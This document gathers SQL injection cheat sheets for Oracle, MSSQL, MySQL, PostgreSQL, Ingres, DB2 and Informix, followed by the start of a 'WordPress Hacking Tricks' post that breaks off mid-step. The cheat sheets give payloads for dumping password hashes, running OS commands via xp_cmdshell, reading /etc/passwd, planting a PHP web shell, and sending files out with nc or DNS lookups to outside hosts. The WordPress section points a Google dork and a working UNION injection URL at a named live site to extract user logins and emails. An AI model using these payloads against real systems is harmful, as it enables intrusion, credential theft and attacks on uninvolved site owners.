From Christian Mehlmauer:
Get all
tablenames in
one string
select rtrim(xmlagg(xmlelement(e, table_name ||
‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables – when using union based
SQLI with only one row
Blind SQLI in
order by clause
order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1)
= ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must
know 2 column names with the same datatype

MSSQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MSSQL databases…

This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “–
priv” at the end of the query.
Version SELECT @@version
Comments
SELECT 1 — comment
SELECT /*comment*/1
Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users SELECT name FROM master..syslogins
List Password
Hashes
SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins —
priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message /
some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from

master.sys.sql_logins — priv, mssql 2005
Password
Cracker
MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack
these.
List Privileges
– current privs on a particular object in 2005, 2008
SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); —
current database
SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); —
current server
SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’,
‘OBJECT’); –permissions on a table
SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);
–permissions on a user– current privs in 2005, 2008
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);
– who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
List DBA
Accounts
SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for
true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other
values from the documentation
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0
for false, NULL for invalid role/username.
SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005

Current Database SELECT DB_NAME()
List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE
name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable
List Tables
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for
views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable
Find Tables From
Column Name
– NB: This example works only for the current database. If you wan’t to search
another db, you need to specify the db name (e.g. replace sysobject with
mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM
sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype
= ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each
column containing the word ‘password’
Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY
name ASC) sq ORDER BY name DESC — gets 9th row
Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
Bitwise AND
SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0
ASCII Value ->
Char
SELECT char(0×41) — returns A

Char -> ASCII
Value
SELECT ascii(‘A’) – returns 65
Casting
SELECT CAST(’1′ as int);
SELECT CAST(1 as char)
String
Concatenation
SELECT ‘A’ + ‘B’ – returns AB
If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
Avoiding Quotes SELECT char(65)+char(66) — returns AB
Time Delay WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
Make DNS
Requests
declare @host varchar(800); select @host = name FROM master..syslogins;
exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on
2000declare @host varchar(800); select @host = name + ‘-’ +
master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from
sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005–
NB: Concatenation is not allowed in calls to these SPs, hence why we have to use
@host. Messy but necessary.
– Also check out theDNS tunnel feature of sqlninja
Command
Execution
EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate
xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
RECONFIGURE; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv
RECONFIGURE; — priv
Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:boot.ini’;
DROP TABLE mydata;
Hostname, IP
Address
SELECT HOST_NAME()
Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv

Drop Users EXEC sp_droplogin ‘user’; — priv
Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
Location of DB
files
EXEC sp_helpdb master; –location of master.mdf
EXEC sp_helpdb pubs; –location of pubs.mdf
Default/System
Databases
northwind
model
msdb
pubs — not on sql server 2005
tempdb
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Dan Crowley:
A way to extract data via SQLi with a MySQL backend
From Jeremy Bae:
Tip about sp_helpdb – included in table above.
From Trip:
List DBAs (included in table above now):
select name from master..syslogins where sysadmin = ’1′
From Daniele Costa:
Tips on using fn_my_permissions in 2005, 2008 – included in table above.
Also:
To check permissions on multiple database you will have to use the following pattern.
USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’)
Note also that in case of using this data with a UNION query a collation error could occur.
In this case a simple trick is to use the following syntax:
select permission_name collate database_default FROM fn_my_permissions (NULL,
‘DATABASE’)

MySQL SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MySQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “–
priv” at the end of the query.
Version SELECT @@version
Comments
SELECT 1; #comment
SELECT /*comment*/1;
Current User
SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password
Hashes
SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges; — list user privsSELECT host, user, Select_priv,
Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv,
Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv,

Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user
privsSELECT grantee, table_schema, privilege_type FROM
information_schema.schema_privileges; — list privs on databases (schemas)SELECT
table_schema, table_name, column_name, privilege_type FROM
information_schema.column_privileges; — list privs on columns
List DBA
Accounts
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host,
user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database SELECT database()
List Databases
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns
SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema !=
‘information_schema’
List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From
Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE
column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered
from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered
from 0
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value ->
Char
SELECT char(65); # returns A
Char -> ASCII
Value
SELECT ascii(‘A’); # returns 65

Casting
SELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String
Concatenation
SELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes SELECT 0×414243; # returns ABC
Time Delay
SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS
Requests
Impossible?
Command
Execution
If mysqld (<5.0) is running as root AND you compromise a DBA account you can
execute OS commands by uploading a shared object file into /usr/lib (or similar). The
.so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly
how you go about this. Remember to compile for the target architecture which may
or may not be the same as your attack platform.
Local File Access
…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable
files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP
Address
SELECT @@hostname;
Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB
files
SELECT @@datadir;
Default/System information_schema (>= mysql 5.0)

Databases mysql

Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “–
priv” at the end of the query.
Version SELECT version()
Comments
SELECT 1; –comment
SELECT /*comment*/1;
Current User
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users SELECT usename FROM pg_user

List Password
Hashes
SELECT usename, passwd FROM pg_shadow — priv
Password
Cracker
MDCrack can crack PostgreSQL’s MD5-based passwords.
List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA
Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current Database SELECT current_database()
List Databases SELECT datname FROM pg_database
List Columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid)
AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND
(N.nspname ILIKE ‘public’)
List Tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN
(‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
Find Tables From
Column Name
If you want to list all the table names that contain a column LIKE
‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N,
pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
Select Nth Row
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows
numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
Bitwise AND
SELECT 6 & 2; — returns 2
SELECT 6 & 1; –returns 0
ASCII Value ->
Char
SELECT chr(65);

Char -> ASCII
Value
SELECT ascii(‘A’);
Casting
SELECT CAST(1 as varchar);
SELECT CAST(’1′ as int);
String
Concatenation
SELECT ‘A’ || ‘B’; — returnsAB
If Statement
IF statements only seem valid inside functions, so aren’t much use for SQL injection.
See CASE statement instead.
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Avoiding Quotes SELECT CHR(65)||CHR(66); — returns AB
Time Delay
SELECT pg_sleep(10); — postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’
language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken
from here .
Make DNS
Requests
Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by
default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser
dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see
below) to resolve hostnames, e.g. “ping pentestmonkey.net”.
Command
Execution
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′,
‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1
8080′); — priv, commands run as postgres/pgsql OS-level user
Local File Access
CREATE TABLE mydata(t text);
COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by
postgres OS-level user
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at
a time
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at
a time …
DROP TABLE mytest mytest;Write to a file:
CREATE TABLE mytable (mycol text);

INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-
level user. Generally you won’t be able to write to the web root, but it’s always
work a try.
– priv user can also read/write files by mapping libc functions
Hostname, IP
Address
SELECT inet_server_addr(); — returns db server IP address (or null if using local
connection)
SELECT inet_server_port(); — returns db server IP address (or null if using local
connection)
Create Users
CREATE USER test1 PASSWORD ‘pass1′; — priv
CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the
same time
Drop Users DROP USER test1; — priv
Make User DBA ALTER USER test1 CREATEUSER CREATEDB; — priv
Location of DB
files
SELECT current_setting(‘data_directory’); — priv
SELECT current_setting(‘hba_file’); — priv
Default/System
Databases
template0
template1

Ingres SQL Injection Cheat Sheet
Ingres seems to be one of the less common database backends for web applications, so I thought
it would be worth installing it and making some notes to make my next Ingres-based web app
test a little easier.
Below are some tabulated notes on how to do many of thing you’d normally do via SQL
injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres
download page is here.
This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn
more.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Version select dbmsinfo(‘_version’);
Comments
SELECT 123; — comment
select 123; /* comment */
Current User
select dbmsinfo(‘session_user’);
select dbmsinfo(‘system_user’);
List Users
First connect to iidbdb, then:
SELECT name, password FROM iiuser; — or
SELECT own FROM iidatabase;
Create Users create user testuser with password = ‘testuser’;– priv

List Password Hashes
First connect to iidbdb, then:
select name, password from iiuser;
List Privileges
select dbmsinfo(‘db_admin’);
select dbmsinfo(‘create_table’);
select dbmsinfo(‘create_procedure’);
select dbmsinfo(‘security_priv’);
select dbmsinfo(‘select_syscat’);
select dbmsinfo(‘db_privileges’);
select dbmsinfo(‘current_priv_mask’);
List DBA Accounts TODO
Current Database select dbmsinfo(‘database’);
List Databases SELECT name FROM iidatabase; — connect to iidbdb
List Columns
select column_name, column_datatype, table_name, table_owner from
iicolumns;
List Tables
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
Find Tables From
Column Name
SELECT table_name, table_owner FROM iicolumns WHERE column_name =
‘value’
Select Nth Row
Astoundingly, this doesn’tseem to be possible! This is as close as you can
get:select top 10 blah from table;
select first 10 blah form table;
Select Nth Char select substr(‘abc’, 2, 1); — returns ‘b’
Bitwise AND
The function “bit_and” exists, but seems hard to use. Here’s an
example of ANDing 3 and 5 together. The result is a “byte” type
with value ?01:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
ASCII Value -> Char TODO
Char -> ASCII Value
TODO
(The “ascii” function exists, but doesn’t seem to do what I’d expect.)

Casting
select cast(123 as varchar);
select cast(’123′ as integer);
String Concatenation select ‘abc’ || ‘def’;
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ???See Heavy Queries article for some ideas.
Make DNS Requests TODO
Command Execution Impossible?
Local File Access TODO
Hostname, IP Address SELECT dbmsinfo(‘ima_server’)
Location of DB files
SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = ‘value’
— primary location of db
SELECT lname FROM iiextend WHERE dname = ‘value’ — extended location of db
SELECT are FROM iilocations where lname = ‘value’ – all area (ie directory) linked
with a location
Default/System
Databases
SELECT name FROM iidatabase WHERE own = ‘$ingres’ — connect to iidbdb
Installing Locally
The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be download from
http://www.vmware.com/appliances/directory/832
Database Client
TODO
There is a client called “sql” which can be used for local connections (at least) in
the database server package above.
Logging in from
command line
$ su - ingres
$ sql iidbdb
* select dbmsinfo(‘_version’); go

Identifying on the
network
TODO
The following areas are interesting enough to include on this page, but I haven’t researched them
for other databases:
Description SQL / Comments
Batching Queries Allowed?
Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn’t matter this is
ignored.
FROM clause mandated in
SELECTs?
No. You don’t need to select form “dual” or anything. The following
is legal:
select 1;
UNION supported
Yes. Nothing tricky here. The following is legal:
select 1 union select 2;
Enumerate Tables Privs select table_name, permit_user, permit_type from iiaccess;
Length of a string select length(‘abc’); — returns 3
Roles and passwords
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;
List Database Procedures
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;
Create Users + Granting Privs
First you need to connect to iidbdb, then:
create user pm with password = ‘password’;
grant all on current installation to pm;

DB2 SQL Injection Cheat Sheet
Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in
my experience. When you do find one, though it pays to be prepared…
Below are some tabulated notes on how to do many of thing you’d normally do via SQL
injection. All tests were performed on DB2 8.2 under Windows.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “–
priv” at the end of the query.
Version select versionnumber, version_timestamp from sysibm.sysversions;
Comments select blah from foo; — comment like this
Current User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users
N/A (I think DB2 uses OS-level user accounts for authentication.)Database
authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges
select * from syscat.tabauth; — privs on tables

select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies
List DBA Accounts
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or
SYSADMAUTH = ‘G’
Current Database select current server from sysibm.sysdummy1;
List Databases SELECT schemaname FROM syscat.schemata;
List Columns select name, tbname, coltype from sysibm.syscolumns;
List Tables select name from sysibm.systables;
Find Tables From
Column Name
select tbname from sysibm.syscolumns where name=’username’
Select Nth Row
select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows
only;
Select Nth Char SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b
Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char select chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Value select ascii(‘A’) from sysibm.sysdummy1; — returns 65
Casting
SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’

Informix SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Informix databases…
Below are some tabulated notes on how to do many of thing you’d normally do via SQL
injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for
Windows. The Informix download page is here.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Version
SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’,
‘level’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows,
U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app
running on 64-bit unix
Comments select 1 FROM systables WHERE tabid = 1; — comment
Current User
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Users select username, usertype, password from sysusers;
List Password Hashes TODO

List Privileges
select tabname, grantor, grantee, tabauth FROM systabauth join systables on
systables.tabid = systabauth.tabid; — which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures
on sysprocauth.procid = sysprocedures.procid; — which procedures are
accessible by which users
List DBA Accounts TODO
Current Database SELECT DBSERVERNAME FROM systables where tabid = 1; — server name
List Databases select name, owner from sysdatabases;
List Columns
select tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid;
List Tables
select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid =
sysviews.tabid;
List Stored
Procedures
select procname, owner FROM sysprocedures;
Find Tables From
Column Name
select tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid where colname like ‘%pass%’;
Select Nth Row
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq
order by tabid desc; — selects the 10th row
Select Nth Char
SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; —
returns ‘C’
Bitwise AND
select bitand(6, 1) from systables where tabid = 1; — returns 0
select bitand(6, 2) from systables where tabid = 1; — returns 2
ASCII Value -> Char TODO
Char -> ASCII Value select ascii(‘A’) from systables where tabid = 1;
Casting
select cast(’123′ as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;

String Concatenation
SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’
SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’
String Length
SELECT tabname, length(tabname), char_length(tabname),
octet_length(tabname) from systables;
If Statement TODO
Case Statement select tabid, case when tabid>10 then “High” else ‘Low’ end from systables;
Avoiding Quotes TODO
Time Delay TODO
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP
Address
SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname
Location of DB files TODO
Default/System
Databases
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don’t seem to contain anything / don’t allow readingInstalling Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and
Windows.
Database ClientThere’s a database client SDK available, but I couldn’t get the demo client
working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge
dev-java/jdbc-informix” on Gentoo).Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon:

 Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will
give you a command prompt with various Environment variables set properly.
 Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows
you to browse databases.
The following were set on my test system. This may help if you get command line access, but
can’t get a GUI – you’ll need to change “testservername”:
set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set
PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSyste
m32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program
FilesIBMInformixClien -SDKbin;C:Program File sibmgsk7bin;C:Program
Filesibmgsk7lib
set
CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMI
BMINF~111.50xtendkrakatoajdbc.jar;
set DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859 -1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
Identifying on the network
My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server
name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all
…
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
…
TODO How would we identify Informix listening on the network?

WordPress Hacking Tricks

I. Hacking WordPress .. (Without Cracking the hashes)
you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th
- september 2012
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
Lets Start ,
1) My Dork
There are number of sqli exploits in different plugins and themes of wordpress. The exploit im
picking is in one of the plugins called Wp-FacebookConnect.. and the google dork for it is ..
Code : inurl:"/?fbconnect_action=myhome"
now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..
2) now the website im going to use here is ..
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
> here the parameter userid is vulnerable to sqli ..
> so lets see what we can get from the data base ..
> im going to change the above URL with this
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,
4,5,concat(user_login,0x3a,user_email)?,7,8,9,10,11,12+from+wp_users--
> now u can see we got the username with the email id ..
> now if i change the above URL to this ..

Code :
